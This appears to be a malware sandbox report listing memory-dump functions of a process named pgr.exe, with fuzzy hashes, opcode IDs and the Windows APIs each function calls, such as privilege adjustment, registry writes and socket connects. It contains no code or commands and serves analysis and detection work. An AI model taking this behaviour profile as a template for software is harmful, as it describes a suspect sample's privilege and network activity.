Source File: 00000001.00000002.369754119.00007FFD067D0000.00000040.00000001.sdmp, Offset: 00007FFD067D0000, based on PE: false

Similarity

API ID:
String ID: PC6e
API String ID: 0-743565189
Opcode ID: c56dc48a300ffb050269a6b3f5ad01be2fbdc0ec26dd17bcd9dc89793d2b43fe
Instruction ID: 1566cb4587ecee8cdb299a1492cbd7f90ed8df29d40ad4cf50675ea4eec188b7
Opcode Fuzzy Hash: c56dc48a300ffb050269a6b3f5ad01be2fbdc0ec26dd17bcd9dc89793d2b43fe
Instruction Fuzzy Hash: 7B431070A18A8D8FEBB5DF28C864BE97BE1FF59300F540565D84DCB292DA34AA44CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD067D36BD, Relevance: 2.2, Instructions: 2208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.369754119.00007FFD067D0000.00000040.00000001.sdmp, Offset: 00007FFD067D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3b380a21ecc4e407d5a169798386636429390a83371522240ce6d59dc6424bb
Instruction ID: 13b13c541de9697f17133098d57fef45a277307e98fb60b277d02af50580472d
Opcode Fuzzy Hash: e3b380a21ecc4e407d5a169798386636429390a83371522240ce6d59dc6424bb
Instruction Fuzzy Hash: 9B132570618A8D8FDBA5DF28C864BE97BF1FF59300F5445A9D84CCB292DB34AA44CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD067D5CA9, Relevance: .4, Instructions: 437COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.369754119.00007FFD067D0000.00000040.00000001.sdmp, Offset: 00007FFD067D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3904a2a05ee460a409c73d29687bad8af1c44c67609a834c11f5b14d9b66720
Instruction ID: 1d420a23640a397bf2dfc2b6e594e2b0ac42fbb06aebbb47e9bfac68361f24cc
Opcode Fuzzy Hash: f3904a2a05ee460a409c73d29687bad8af1c44c67609a834c11f5b14d9b66720
Instruction Fuzzy Hash: 14F18370A18A8D8FEBA1DF1CC864BE97BE0FF59340F544569E84DCB252DB34A984CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD067D0189, Relevance: .4, Instructions: 371COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.369754119.00007FFD067D0000.00000040.00000001.sdmp, Offset: 00007FFD067D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f47bfbafa3b6183596cca19d75299546d793b10a09e8b670fa9fb54f76a4a53
Instruction ID: a0a881a811ac298183b7ec4cbd23374edb74b43dd9fc388ee6503387419f2165
Opcode Fuzzy Hash: 3f47bfbafa3b6183596cca19d75299546d793b10a09e8b670fa9fb54f76a4a53
Instruction Fuzzy Hash: E2D19571A0DBC98FE747DB18C860B56BBE1EF9A340F4945EAD08CCB293C5289845CB12

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD067D5825, Relevance: .3, Instructions: 348COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.369754119.00007FFD067D0000.00000040.00000001.sdmp, Offset: 00007FFD067D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54583da6c091212ec28bb46a39de1dba9145888cccc126d37c50b8a852760107
Instruction ID: bda7428622d3f6897ec24e68d6b2844f9d18963b96cbc3b2155b4000252fa3ae
Opcode Fuzzy Hash: 54583da6c091212ec28bb46a39de1dba9145888cccc126d37c50b8a852760107
Instruction Fuzzy Hash: 0ED15270A18A8D8FEB90DF1CC854BE97BE0FF59344F5445A9E84CCB292DB34A984CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD067D070D, Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.369754119.00007FFD067D0000.00000040.00000001.sdmp, Offset: 00007FFD067D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6b7b83e0e121cb8cf54960c18718422c2428f34b8ffce3003439816564238dc
Instruction ID: ea79b135d7ad5519ff01a9cefca70ecf42d00ec625c341928362ef0692cb6e20
Opcode Fuzzy Hash: b6b7b83e0e121cb8cf54960c18718422c2428f34b8ffce3003439816564238dc
Instruction Fuzzy Hash: 4F81F870619A8D8FEBB1DF18C859BE93BE0FF58300F50456AD84DCB291DB746689CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD067D000B, Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.369754119.00007FFD067D0000.00000040.00000001.sdmp, Offset: 00007FFD067D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e9ecc48380d89913dfc27008a72165d0ca81a2c1ad9d4fcf39c32b3e4b4119d
Instruction ID: 5aaf57206dd018b0dd9794a21acd19bdda512af008aea809aba04eef6af2396e
Opcode Fuzzy Hash: 5e9ecc48380d89913dfc27008a72165d0ca81a2c1ad9d4fcf39c32b3e4b4119d
Instruction Fuzzy Hash: F341C492A1EBC56FEB538F240C351647FB0AF97244F0D59EBD4D8DA4E7D8186809C322

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD067D05A3, Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.369754119.00007FFD067D0000.00000040.00000001.sdmp, Offset: 00007FFD067D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a81392e1e2d48d165face69ff9ea9988c16886cc920c434350c149b57b03b037
Instruction ID: d8b49ad80d4f72d02458da1976602ec4cbcd08931f9a740e0477b0b193ecaac1
Opcode Fuzzy Hash: a81392e1e2d48d165face69ff9ea9988c16886cc920c434350c149b57b03b037
Instruction Fuzzy Hash: 93319220A1DB458FF765EB28C8A17AAB7E1FFD9310F4445B9C08DC7292CE386845DB42

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: pgr.exe PID: 1068 Parent PID: 5972 pgr.exeCOMMON

Executed Functions

Function 04982657, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 049826D7

Memory Dump Source

Source File: 00000002.00000002.613051714.0000000004980000.00000040.00000001.sdmp, Offset: 04980000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: e8534e713fc5a59c0b327c7b53ff69cb40fbb63a30c252003b1e52d53c0068bb
Instruction ID: bccd51360fe637e97b2b0c398db2c4dbf109800f91aac96853ceafe23ed38efb
Opcode Fuzzy Hash: e8534e713fc5a59c0b327c7b53ff69cb40fbb63a30c252003b1e52d53c0068bb
Instruction Fuzzy Hash: 39219F76509784AFDB128F25DC44B52BFF8AF06310F0884EAE9858B163D271A918DB62

Uniqueness

Uniqueness Score: -1.00%

Function 0498268E, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 049826D7

Memory Dump Source

Source File: 00000002.00000002.613051714.0000000004980000.00000040.00000001.sdmp, Offset: 04980000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 574459f0cfc758ec1cbef92545bb2b059069951e93b7f1693745c05129b191b5
Instruction ID: a2086202e9e6341a20d0e4365f1fb1e61d74e20225efd8eedb0246df828de04c
Opcode Fuzzy Hash: 574459f0cfc758ec1cbef92545bb2b059069951e93b7f1693745c05129b191b5
Instruction Fuzzy Hash: 05115A365007049FDB209F69D884B66FBE8EF44320F08C4AEEE498B612E671E418DB71

Uniqueness

Uniqueness Score: -1.00%

Function 049804AE, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,00000E2C,?,?), ref: 049804FE

Memory Dump Source

Source File: 00000002.00000002.613051714.0000000004980000.00000040.00000001.sdmp, Offset: 04980000, based on PE: false

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: c5339fbfd9c09a427a2877009553309d27fa20159201bbcf80ab3e04749468fe
Instruction ID: e4c865a3c919bfdfad1cd24857176e946e924d53a2d7308b7e9785ac18b46a52
Opcode Fuzzy Hash: c5339fbfd9c09a427a2877009553309d27fa20159201bbcf80ab3e04749468fe
Instruction Fuzzy Hash: 40018B72500600ABD610DF16DC82B26FBA8EB88A20F14815AED088B741E371B916CAA6

Uniqueness

Uniqueness Score: -1.00%

Function 04982F89, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

GetClassInfoW.USER32 ref: 04983032

Strings

xqT, xrefs: 04982FBD

Memory Dump Source

Source File: 00000002.00000002.613051714.0000000004980000.00000040.00000001.sdmp, Offset: 04980000, based on PE: false

Similarity

API ID: ClassInfo
String ID: xqT
API String ID: 3534257612-780308692
Opcode ID: d35875093e76dadb62321dec1c2dd45a092678e533a251610695eda8b0c4b360
Instruction ID: 6e2a958446502e3003f9ed6d9f880a696d5b5c89a9f5e4453453552db26d9028
Opcode Fuzzy Hash: d35875093e76dadb62321dec1c2dd45a092678e533a251610695eda8b0c4b360
Instruction Fuzzy Hash: F1313C7550E3C05FD7138B25DC60A55BFB4AF07610B0D80DBD884CF1A3D669A808C772

Uniqueness

Uniqueness Score: -1.00%

Function 0498073D, Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 0498084D

Memory Dump Source

Source File: 00000002.00000002.613051714.0000000004980000.00000040.00000001.sdmp, Offset: 04980000, based on PE: false

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 8b37e125a2805ba23216deb221d34ec4c97c491f43085343401003ef058b4e65
Instruction ID: 3a4d5c1eb96e737dcf00586cf2197bae76042d1391316d2efe195703312b5688
Opcode Fuzzy Hash: 8b37e125a2805ba23216deb221d34ec4c97c491f43085343401003ef058b4e65
Instruction Fuzzy Hash: 4941C3715093806FE7128B25DC55F96FFB8EF42620F1884DFEA849F293D265A508CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00A80B68, Relevance: 1.6, APIs: 1, Instructions: 110COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00A80B8F

Memory Dump Source

Source File: 00000002.00000002.600952646.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 06ab7e426c14241819e7130bd5e1cd3c55fcd2cd437deb25d240ccdb57705bd5
Instruction ID: 90c99b109ecf621799943b369bc8500bbef87e959d1f38b8ba10604086fe5c29
Opcode Fuzzy Hash: 06ab7e426c14241819e7130bd5e1cd3c55fcd2cd437deb25d240ccdb57705bd5
Instruction Fuzzy Hash: 86419170A102048FCB44EF78C88499DBBB6EF88314B258579D909DB399DB30DD86CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04982162, Relevance: 1.6, APIs: 1, Instructions: 99registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNELBASE(?,00000E2C), ref: 04982229

Memory Dump Source

Source File: 00000002.00000002.613051714.0000000004980000.00000040.00000001.sdmp, Offset: 04980000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: fab097f8f9d41351bbc5fc1020b0b75a8e911a3464cda1b9aa69551aa4564844
Instruction ID: c3da75b95c8f7380465c208bc673e040b0d9ffe575488147717274985707d339
Opcode Fuzzy Hash: fab097f8f9d41351bbc5fc1020b0b75a8e911a3464cda1b9aa69551aa4564844
Instruction Fuzzy Hash: B1314F72504344AFE7229B65CC84F67BFECEF09710F1889AAE985DB152D364E904CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04980D10, Relevance: 1.6, APIs: 1, Instructions: 95timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNELBASE(?,00000E2C,2B9D0D92,00000000,00000000,00000000,00000000), ref: 04980DAD

Memory Dump Source

Source File: 00000002.00000002.613051714.0000000004980000.00000040.00000001.sdmp, Offset: 04980000, based on PE: false

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 75338085243e978b70735ae70cd990700807c76bf02470ccbb88757b8965d873
Instruction ID: 2e1048f8f34cff3b5977b2316f44761f4c5f2eab3280dd9ba1cda6547495a893
Opcode Fuzzy Hash: 75338085243e978b70735ae70cd990700807c76bf02470ccbb88757b8965d873
Instruction Fuzzy Hash: E931D472409380AFEB128F25DC45F96BFB8EF46310F0984EBE9859F192D265A509CB71

Uniqueness

Uniqueness Score: -1.00%

Function 04980E18, Relevance: 1.6, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,00000E2C), ref: 04980EB7

Memory Dump Source

Source File: 00000002.00000002.613051714.0000000004980000.00000040.00000001.sdmp, Offset: 04980000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 22dcdb946752c0f6ac5bca96662da040cdb830a36595f0b2e2808fac0e57995d
Instruction ID: 937694fe7d942fe934b2995fba443f072237e12d802b3a312ed4e2318b7fb251
Opcode Fuzzy Hash: 22dcdb946752c0f6ac5bca96662da040cdb830a36595f0b2e2808fac0e57995d
Instruction Fuzzy Hash: 16319F72504344AFEB228F65DC44F67BFACEF46720F0488AEF985DB152D264A419CB71

Uniqueness

Uniqueness Score: -1.00%

Function 04983B7A, Relevance: 1.6, APIs: 1, Instructions: 91COMMON

Download Yara Rule

APIs

GetTempFileNameW.KERNELBASE(?,00000E2C,?,?), ref: 04983C36

Memory Dump Source

Source File: 00000002.00000002.613051714.0000000004980000.00000040.00000001.sdmp, Offset: 04980000, based on PE: false

Similarity

API ID: FileNameTemp
String ID:
API String ID: 745986568-0
Opcode ID: aaa1f08ce5f225f224967bc478859b0ffb0155c5cd39f608ef987626f818a562
Instruction ID: 74235209d594cf26cdd88cbfcc1a8105142c13fae20a8d865881471f21a0b1ae
Opcode Fuzzy Hash: aaa1f08ce5f225f224967bc478859b0ffb0155c5cd39f608ef987626f818a562
Instruction Fuzzy Hash: 15315A6140E3C06FD7139B258C61B62BFB4EF87610F0A81DBD884CB5A3D6646819C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 0498060C, Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E2C), ref: 049806A3

Memory Dump Source

Source File: 00000002.00000002.613051714.0000000004980000.00000040.00000001.sdmp, Offset: 04980000, based on PE: false

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: c40b90c3ffd25dd09cb80c7ec4e8ef17f184a4fffc8c25feaedbf0c163b3bb0d
Instruction ID: 62ef47927baef890bbcdeeb405c1857cb39c018b4b65ac95abf422780b0c4011
Opcode Fuzzy Hash: c40b90c3ffd25dd09cb80c7ec4e8ef17f184a4fffc8c25feaedbf0c163b3bb0d
Instruction Fuzzy Hash: B7318172504345AFE7219F65DC45F67BFACEF46310F0885ABE944DB152D264A808CB61

Uniqueness

Uniqueness Score: -1.00%

Function 049808A4, Relevance: 1.6, APIs: 1, Instructions: 87fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNELBASE ref: 04980956

Memory Dump Source

Source File: 00000002.00000002.613051714.0000000004980000.00000040.00000001.sdmp, Offset: 04980000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: b54d3b210eb0fabdabcbdddb7f707494ea9cd61fd44ab26585413ccde59c39df
Instruction ID: 242f1d30b73d249da2c1c843647cb77f9e78b0871ea0e3ee30d6a357a49c54b2
Opcode Fuzzy Hash: b54d3b210eb0fabdabcbdddb7f707494ea9cd61fd44ab26585413ccde59c39df
Instruction Fuzzy Hash: F531C2B2404780AFE722CF55DC45F96FFF8EF06320F04859EE9848B252D365A509CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0498218E, Relevance: 1.6, APIs: 1, Instructions: 86registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNELBASE(?,00000E2C), ref: 04982229

Memory Dump Source

Source File: 00000002.00000002.613051714.0000000004980000.00000040.00000001.sdmp, Offset: 04980000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 1ebf0cdc41978f820892f7b506beb20b4499403cd2fdeefb8bdae160908a8fab
Instruction ID: 686fe812913801c6431fb143f93e516dec7051ad55d3d02252b3284a3216fdf9
Opcode Fuzzy Hash: 1ebf0cdc41978f820892f7b506beb20b4499403cd2fdeefb8bdae160908a8fab
Instruction Fuzzy Hash: 67217C72600604AFEB219F69CC84F67BBECEF08710F1489AAEA45DA251D660F5088B71

Uniqueness

Uniqueness Score: -1.00%

Function 049811B8, Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

GetVolumeInformationA.KERNELBASE(?,00000E2C,?,?), ref: 0498125E

Memory Dump Source

Source File: 00000002.00000002.613051714.0000000004980000.00000040.00000001.sdmp, Offset: 04980000, based on PE: false

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: 0a3c5ebdbf9532f8372e5568e53138e1e85c32c973f0dc268341aab9549a75ab
Instruction ID: fb5ee30637b0a003000ec07522a355a4758f6848f21a4e836eae97bfb5c62473
Opcode Fuzzy Hash: 0a3c5ebdbf9532f8372e5568e53138e1e85c32c973f0dc268341aab9549a75ab
Instruction Fuzzy Hash: 9E318F7140D3C16FD3138B258C55B62BFB8EF87610F0981DBE8848F6A3D265A949C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 04980006, Relevance: 1.6, APIs: 1, Instructions: 81registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E2C,?,?), ref: 049800AA

Memory Dump Source

Source File: 00000002.00000002.613051714.0000000004980000.00000040.00000001.sdmp, Offset: 04980000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 6597676d2a56befa1b3957db4346b89de844a76f48d7687f39d3a9ab513b2568
Instruction ID: 34977ebc1da841e2b792cf701a606c589984d240a1629d869523068cc6b71de6
Opcode Fuzzy Hash: 6597676d2a56befa1b3957db4346b89de844a76f48d7687f39d3a9ab513b2568
Instruction Fuzzy Hash: A921B57550E3C06FD3138B219C51B22BFB4EF87610F0A81CBE9848B6A3D2656919C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 04982401, Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

select.WS2_32(?,?,?,?,?), ref: 04982490

Memory Dump Source

Source File: 00000002.00000002.613051714.0000000004980000.00000040.00000001.sdmp, Offset: 04980000, based on PE: false

Similarity

API ID: select
String ID:
API String ID: 1274211008-0
Opcode ID: d1adabe5947a79d454a9f1f1a8c03fc26fbd086be595c81a7a3e99383a13a4e6
Instruction ID: 59acc39a697cfb4c2ec2f28ad3844a5d2ffd56ea37e8d5ea748695b918f89415
Opcode Fuzzy Hash: d1adabe5947a79d454a9f1f1a8c03fc26fbd086be595c81a7a3e99383a13a4e6
Instruction Fuzzy Hash: 24213C75509384AFD712CF29D844B52BFE8EF06210F0984EAE989CB162D275A948DB71

Uniqueness

Uniqueness Score: -1.00%

Function 04980E3A, Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,00000E2C), ref: 04980EB7

Memory Dump Source

Source File: 00000002.00000002.613051714.0000000004980000.00000040.00000001.sdmp, Offset: 04980000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 374148daadbee6ce06460a165d4925d42f6217d636c9f204703153133c6ec5ef
Instruction ID: fcc8cab3f180c1164a7096aa82a3af5dfbe5f8655bddeb71e64909f658dae5b1
Opcode Fuzzy Hash: 374148daadbee6ce06460a165d4925d42f6217d636c9f204703153133c6ec5ef
Instruction Fuzzy Hash: 48219D72500304AFEB219F69DC85F6BBBACEF04320F14886AEE45DB252D674A4188B71

Uniqueness

Uniqueness Score: -1.00%

Function 049827D9, Relevance: 1.6, APIs: 1, Instructions: 79COMMON

Download Yara Rule

APIs

GetExitCodeProcess.KERNELBASE(?,00000E2C,2B9D0D92,00000000,00000000,00000000,00000000), ref: 04982860

Memory Dump Source

Source File: 00000002.00000002.613051714.0000000004980000.00000040.00000001.sdmp, Offset: 04980000, based on PE: false

Similarity

API ID: CodeExitProcess
String ID:
API String ID: 3861947596-0
Opcode ID: cae0fc586f4dc9deb233e693ee4502b6403ccd39ac19bfdbd56ab37b48361287
Instruction ID: ae61d2e202cfd83b77c1448dd5bb9b2a050e2d5719a38d52419a8f3bcc38a733
Opcode Fuzzy Hash: cae0fc586f4dc9deb233e693ee4502b6403ccd39ac19bfdbd56ab37b48361287
Instruction Fuzzy Hash: 7021A4725093846FEB128B25DC45F96BFA8EF42310F1880EBE944DF192D664A908C771

Uniqueness

Uniqueness Score: -1.00%

Function 049800D6, Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 04980162

Memory Dump Source

Source File: 00000002.00000002.613051714.0000000004980000.00000040.00000001.sdmp, Offset: 04980000, based on PE: false

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 384aca0ee1c4ded6e9d205f4169f0dbf77b4333556d0d3dbd17b75ac07e6dbc2
Instruction ID: 6ec02bc3024b4025a2bd71b5798031abe0003d0245a42e1f478f34cb8bde12d4
Opcode Fuzzy Hash: 384aca0ee1c4ded6e9d205f4169f0dbf77b4333556d0d3dbd17b75ac07e6dbc2
Instruction Fuzzy Hash: 3421AD71404380AFE722CF65DC84F96FFF8EF45220F08849EEA858B252D375A408CB61

Uniqueness

Uniqueness Score: -1.00%

Function 049824D0, Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 04982556

Memory Dump Source

Source File: 00000002.00000002.613051714.0000000004980000.00000040.00000001.sdmp, Offset: 04980000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: ade66ca110e07d4985f3228f9e0715696c43f99c8f9cd14207937fedbae32553
Instruction ID: 8865c4c0ab8596872e98a1cee6b4abf83c32f5389bb625c5aba21d5312fdd346
Opcode Fuzzy Hash: ade66ca110e07d4985f3228f9e0715696c43f99c8f9cd14207937fedbae32553
Instruction Fuzzy Hash: 682181B25093845FD7129F25DC55B52BFA8AF46214F1884EEED48CF253E225E808CB71

Uniqueness

Uniqueness Score: -1.00%

Function 04980632, Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E2C), ref: 049806A3

Memory Dump Source

Source File: 00000002.00000002.613051714.0000000004980000.00000040.00000001.sdmp, Offset: 04980000, based on PE: false

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: e04f351d9d8021272d98deafbaa25c1e5648ef8d1cacf42e1176e99ae343b5d4
Instruction ID: e77ffbf536e08bb67ea1f39e5400dbbcc5521f80d0cf6fa97d724cd972653799
Opcode Fuzzy Hash: e04f351d9d8021272d98deafbaa25c1e5648ef8d1cacf42e1176e99ae343b5d4
Instruction Fuzzy Hash: 8A215E72600205AFEB20AF29DC85F6AFBACEB44710F14856AED45DB241E664A5098B71

Uniqueness

Uniqueness Score: -1.00%

Function 04980526, Relevance: 1.6, APIs: 1, Instructions: 75registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E2C,2B9D0D92,00000000,00000000,00000000,00000000), ref: 049805B8

Memory Dump Source

Source File: 00000002.00000002.613051714.0000000004980000.00000040.00000001.sdmp, Offset: 04980000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 6681555591b636b4b2a04be8806aff212d7277ff884cde3058402f22964772d1
Instruction ID: 58a62352506ee8d3d81c63d7494c8ed9d23f2b6dff189e4f8ed8a9dfd7f60d4f
Opcode Fuzzy Hash: 6681555591b636b4b2a04be8806aff212d7277ff884cde3058402f22964772d1
Instruction Fuzzy Hash: A3214A72505344AFD7228F15DC44F56BFA8AF46710F0884AAEA859B252D264E548CB71

Uniqueness

Uniqueness Score: -1.00%

Function 049829A7, Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetProcessWorkingSetSize.KERNEL32(?,00000E2C,2B9D0D92,00000000,00000000,00000000,00000000), ref: 04982A23

Memory Dump Source

Source File: 00000002.00000002.613051714.0000000004980000.00000040.00000001.sdmp, Offset: 04980000, based on PE: false

Similarity

API ID: ProcessSizeWorking
String ID:
API String ID: 3584180929-0
Opcode ID: 7ff816ae51dccb37b1495d7f95b8bf0e189d7565ed13bf6bd1bad5b5930b0af7
Instruction ID: 884826f2c2ee2099f00f097ce3844149a10a6f15dfcee5e95e5e7d9ce40f9e3d
Opcode Fuzzy Hash: 7ff816ae51dccb37b1495d7f95b8bf0e189d7565ed13bf6bd1bad5b5930b0af7
Instruction Fuzzy Hash: 56219572505384AFE711CF25DC45F56BFACEF46310F08C4ABE945DB192D264A504CB71

Uniqueness

Uniqueness Score: -1.00%

Function 049828C3, Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

GetProcessWorkingSetSize.KERNEL32(?,00000E2C,2B9D0D92,00000000,00000000,00000000,00000000), ref: 0498293F

Memory Dump Source

Source File: 00000002.00000002.613051714.0000000004980000.00000040.00000001.sdmp, Offset: 04980000, based on PE: false

Similarity

API ID: ProcessSizeWorking
String ID:
API String ID: 3584180929-0
Opcode ID: 7ff816ae51dccb37b1495d7f95b8bf0e189d7565ed13bf6bd1bad5b5930b0af7
Instruction ID: 6482a1599868b8cfd432982fdd412ffd64ca1a02b3b3a2d995a9aee1c7cf2bc0
Opcode Fuzzy Hash: 7ff816ae51dccb37b1495d7f95b8bf0e189d7565ed13bf6bd1bad5b5930b0af7
Instruction Fuzzy Hash: 73219272509384AFEB12CF25DC45F66FFA8EF46310F08C4ABEA44DB252D265A504CB71

Uniqueness

Uniqueness Score: -1.00%

Function 0498233B, Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000E2C,2B9D0D92,00000000,00000000,00000000,00000000), ref: 049823B7

Memory Dump Source

Source File: 00000002.00000002.613051714.0000000004980000.00000040.00000001.sdmp, Offset: 04980000, based on PE: false

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: a94fe9165b2abafa08e8af15abef29a89a3624cca05867a163c3d78b7c1b3489
Instruction ID: 5f251abe536499ed564f8c5f06d8e110ec6067bdb0558f4714e2e3c04167de33
Opcode Fuzzy Hash: a94fe9165b2abafa08e8af15abef29a89a3624cca05867a163c3d78b7c1b3489
Instruction Fuzzy Hash: 59219372409384AFEB12CF65DC85F57FFA8EF46710F0884ABEA459B252D274A508C772

Uniqueness

Uniqueness Score: -1.00%

Function 049807E2, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 0498084D

Memory Dump Source

Source File: 00000002.00000002.613051714.0000000004980000.00000040.00000001.sdmp, Offset: 04980000, based on PE: false

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 11db90da0cced5dede9bdd4456288771c4451ff19b1cf7d055cd10e5cce5d7e7
Instruction ID: cd1fcb76b1b32b12e7b8bd413aba157f1b3e1428b37bb4d09af230b31bb4df39
Opcode Fuzzy Hash: 11db90da0cced5dede9bdd4456288771c4451ff19b1cf7d055cd10e5cce5d7e7
Instruction Fuzzy Hash: 47219F71500204AFE720EF29DC45B66FBD8EF44710F14846EEE448B241D671A448CA71

Uniqueness

Uniqueness Score: -1.00%

Function 04981013, Relevance: 1.6, APIs: 1, Instructions: 68networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 04981092

Memory Dump Source

Source File: 00000002.00000002.613051714.0000000004980000.00000040.00000001.sdmp, Offset: 04980000, based on PE: false

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: 9156a7c3442f7646b5e0fe7b6ae7d340fb9e6925c2ce65d36c0414bf0bbc4229
Instruction ID: 6c36c542a88b9ac293b05bcbfc8328df4223562cb77b5a0b5e695e4bede2fe8a
Opcode Fuzzy Hash: 9156a7c3442f7646b5e0fe7b6ae7d340fb9e6925c2ce65d36c0414bf0bbc4229
Instruction Fuzzy Hash: 7621AF71009380AFDB228F65DC84A92BFF4EF06310F0984EAE9858F162D375A809CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04982724, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 04982790

Memory Dump Source

Source File: 00000002.00000002.613051714.0000000004980000.00000040.00000001.sdmp, Offset: 04980000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: b2a7806104c25fb32acb40ea3923b45b5c7bf63cf36dfb4bbc4f2f5c477911fd
Instruction ID: f652baf6c71ca6502f19b45b8b26f66f19bad0be7f8d806741c93f063d63ca48
Opcode Fuzzy Hash: b2a7806104c25fb32acb40ea3923b45b5c7bf63cf36dfb4bbc4f2f5c477911fd
